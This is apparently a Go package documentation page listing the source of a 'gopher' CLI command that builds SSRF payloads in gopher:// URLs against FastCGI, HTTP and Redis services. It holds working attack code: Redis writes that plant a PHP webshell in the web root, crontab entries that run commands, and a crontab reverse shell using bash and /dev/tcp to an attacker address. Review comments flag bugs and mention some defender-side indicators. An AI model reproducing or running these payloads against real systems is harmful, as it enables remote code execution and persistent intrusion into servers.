Documentation ¶
Index ¶
- Variables
- func GenGopherExpByListen(targetAddr string, port int, noQuit bool) (string, error)
- func GopherFastCGIExp(addr string, cmd, filename string) (string, error)
- func GopherHTTPPostExp(addr string, uri string, datas map[string]string) (string, error)
- func GopherHTTPUploadExp(addr string, uri string, datas map[string]string) (string, error)
- func GopherRedisWriteExp(addr, path, name, data string) (string, error)
- func QueryEscape(r string, count int) string
Constants ¶
This section is empty.
Variables ¶
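// Cmd is the "gopher" command tree. Every subcommand follows the same shape:
// read its flags, fill in defaults for the ones left empty, build one payload
// string with a Gopher*Exp / GenGopherExpByListen helper, URL-encode it
// "urlencode" times, and print the result to stdout. How the helpers assemble
// the payload is not visible in this declaration.
//
// The output is presumably intended to travel in a gopher:// URL (per the
// command's Usage text), so the matching controls on the defended side are
// the scheme allow-list of any server-side URL fetcher and the reachability
// and authentication of FastCGI and Redis listeners.
var Cmd = &cli.Command{
	Category: "Web",
	Name:     "gopher",
	Usage:    "Generate Gopher Exp",
	Flags: []cli.Flag{
		urlencodeFlag,
	},
	Commands: []*cli.Command{
		{
			// fastcgi: payload for a FastCGI listener. Defaults: command "id",
			// script path "/usr/share/php/PEAR.php".
			Category: "Other",
			Name:     "fastcgi",
			Aliases:  []string{"fcgi"},
			Usage:    "FastCGI",
			Flags: []cli.Flag{
				targetAddrFlag,
				filenameFlag,
				&cli.StringFlag{
					Name:    "command",
					Aliases: []string{"c"},
					Value:   "id",
					Usage:   "Command",
				},
			},
			Action: func(c *cli.Context) (err error) {
				filename := c.String("filename")
				if filename == "" {
					filename = "/usr/share/php/PEAR.php"
				}
				r, err := GopherFastCGIExp(c.String("target"), c.String("command"), filename)
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// post: wraps an HTTP POST of the key=value pairs given with --data.
			Category: "HTTP",
			Name:     "post",
			Usage:    "HTTP Post",
			Flags: []cli.Flag{
				targetURLFlag,
				&cli.StringMapFlag{
					Name:     "data",
					Aliases:  []string{"d"},
					Usage:    "Post data. key=value",
					Required: true,
				},
			},
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				// NOTE(review): the test is for the bare prefix "http", so a
				// scheme-less host whose name happens to start with those
				// letters is parsed as if it already carried a scheme.
				// Confirm whether "http://" / "https://" was intended.
				if !strings.HasPrefix(target, "http") {
					target = fmt.Sprintf("http://%s", target)
				}
				targetURL, err := url.Parse(target)
				if err != nil {
					return err
				}
				r, err := GopherHTTPPostExp(targetURL.Host, targetURL.RequestURI(), c.StringMap("data"))
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// upload: same flow as post, built with GopherHTTPUploadExp.
			Category: "HTTP",
			Name:     "upload",
			Usage:    "HTTP Upload",
			Flags: []cli.Flag{
				targetURLFlag,
				&cli.StringMapFlag{
					Name:     "data",
					Aliases:  []string{"d"},
					Usage:    "Post data/upload file. key=value or name=content",
					Required: true,
				},
			},
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				// Same bare-"http" prefix test as the post subcommand.
				if !strings.HasPrefix(target, "http") {
					target = fmt.Sprintf("http://%s", target)
				}
				targetURL, err := url.Parse(target)
				if err != nil {
					return err
				}
				r, err := GopherHTTPUploadExp(targetURL.Host, targetURL.RequestURI(), c.StringMap("data"))
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// listen: derives the payload from GenGopherExpByListen, which is
			// given a local port (default 9527).
			//
			// NOTE(review): three things here do not line up and need the
			// author's confirmation:
			//   - the guard requires a positional argument, but the address is
			//     then read from the "target" flag, which this subcommand does
			//     not declare itself;
			//   - "times" is declared but never read in this Action;
			//   - "no-quit" defaults to true and its negation is passed as the
			//     helper's noQuit parameter, which reads inverted against the
			//     flag name and its Usage text.
			Category: "Redis",
			Name:     "listen",
			Usage:    "By Listen redis-cli command",
			Flags: []cli.Flag{
				&cli.IntFlag{
					Name:    "port",
					Aliases: []string{"p"},
					Value:   9527,
					Usage:   "Listen Port",
				},
				&cli.IntFlag{
					Name:    "times",
					Aliases: []string{"t"},
					Value:   1,
					Usage:   "Number of accept times",
				},
				&cli.BoolFlag{
					Name:    "no-quit",
					Aliases: []string{"no"},
					Value:   true,
					Usage:   "Redis reply 'quit' at the end",
				},
			},
			Action: func(c *cli.Context) (err error) {
				if c.NArg() < 1 {
					return fmt.Errorf("not found arg [addr]")
				}
				r, err := GenGopherExpByListen(c.String("target"), c.Int("port"), !c.Bool("no-quit"))
				if err != nil {
					return err
				}
				// Unlike its siblings this subcommand encodes with
				// url.QueryEscape directly; whether the package's QueryEscape
				// helper is equivalent is not visible from here.
				for i := 0; i < c.Int("urlencode"); i++ {
					r = url.QueryEscape(r)
				}
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// write: generic Redis file write. Defaults: name "root",
			// directory "/var/www/html/", placeholder content.
			Category: "Redis",
			Name:     "write",
			Usage:    "Redis Write File",
			Flags:    redisFlags,
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				filename := c.String("filename")
				filepath := c.String("filepath")
				content := c.String("content")
				if filename == "" {
					filename = "root"
				}
				if filepath == "" {
					filepath = "/var/www/html/"
				}
				if content == "" {
					content = "Gopher Exp Redis Write File"
				}
				r, err := GopherRedisWriteExp(target, filepath, filename, content)
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// webshell: same write path with a PHP file name and body as
			// defaults. On the defended side the artefact is a new .php file
			// under the web root that the Redis process wrote.
			Category: "Redis",
			Name:     "webshell",
			Usage:    "Redis Write Webshell",
			Flags:    redisFlags,
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				filename := c.String("filename")
				filepath := c.String("filepath")
				content := c.String("content")
				if filename == "" {
					filename = "virzz.php"
				}
				if filepath == "" {
					filepath = "/var/www/html/"
				}
				if content == "" {
					content = "\r\n<?php system($_GET['cmd']);?>\r\n"
				}
				r, err := GopherRedisWriteExp(target, filepath, filename, content)
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// Crontab variant of the write path (default directory
			// "/var/spool/cron/").
			//
			// NOTE(review): Name is "write", the same as the generic
			// subcommand above, so the two collide; the Usage text suggests a
			// distinct name was intended. The "crontab" flag read below must
			// come from redisFlags, which is not visible here.
			Category: "Redis",
			Name:     "write",
			Usage:    "Redis Write Crontab",
			Flags:    redisFlags,
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				filename := c.String("filename")
				filepath := c.String("filepath")
				content := c.String("content")
				if filename == "" {
					filename = "root"
				}
				if filepath == "" {
					filepath = "/var/spool/cron/"
				}
				if content == "" {
					content = fmt.Sprintf("\n\n\n\n*/1 * * * * sh -c \"%s\"\n\n\n\n", c.String("crontab"))
				}
				r, err := GopherRedisWriteExp(target, filepath, filename, content)
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
		{
			// reverse: crontab variant whose entry is built from the address
			// given with --reverse. The flag's own Action validates the value
			// with utils.ValidFlag, but only when the flag is supplied.
			Category: "Redis",
			Name:     "reverse",
			Usage:    "Redis Write File",
			Flags: []cli.Flag{
				targetAddrFlag,
				filenameFlag,
				filepathFlag,
				&cli.StringFlag{
					Name:    "reverse",
					Aliases: []string{"r"},
					Usage:   "Write Crontab Reverse shell addr",
					Action: func(c *cli.Context, target string) error {
						return utils.ValidFlag(target, "tcp_addr")
					},
				},
			},
			Action: func(c *cli.Context) (err error) {
				target := c.String("target")
				filename := c.String("filename")
				filepath := c.String("filepath")
				if filename == "" {
					filename = "root"
				}
				if filepath == "" {
					filepath = "/var/spool/cron/"
				}
				// The resolve error used to be discarded: an unparsable value
				// left addr nil and the dereference below panicked, and an
				// empty or host-less value produced an entry containing
				// "<nil>". Both now surface as ordinary errors.
				addr, err := net.ResolveTCPAddr("tcp", c.String("reverse"))
				if err != nil {
					return err
				}
				if addr == nil || addr.IP == nil {
					return fmt.Errorf("invalid reverse addr %q", c.String("reverse"))
				}
				content := fmt.Sprintf("\n\n\n\n*/1 * * * * sh -c \"bash -i >& /dev/tcp/%s/%d 0>&1\"\n\n\n\n", addr.IP.String(), addr.Port)
				r, err := GopherRedisWriteExp(target, filepath, filename, content)
				if err != nil {
					return err
				}
				r = QueryEscape(r, c.Int("urlencode"))
				_, err = fmt.Println(r)
				return
			},
		},
	},
}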
Functions ¶
func GenGopherExpByListen ¶ added in v0.1.6
GenGopherExpByListen generates a gopher exp by listening to traffic.
func GopherFastCGIExp ¶ added in v0.1.6
GopherFastCGIExp generates the FastCGI exp for Gopher.
func GopherHTTPPostExp ¶ added in v0.1.6
GopherHTTPPostExp generates the HTTP POST exp for Gopher.
func GopherHTTPUploadExp ¶ added in v0.1.6
GopherHTTPUploadExp generates the HTTP upload exp for Gopher.
func GopherRedisWriteExp ¶ added in v0.1.6
func QueryEscape ¶ added in v0.1.6
Types ¶
This section is empty.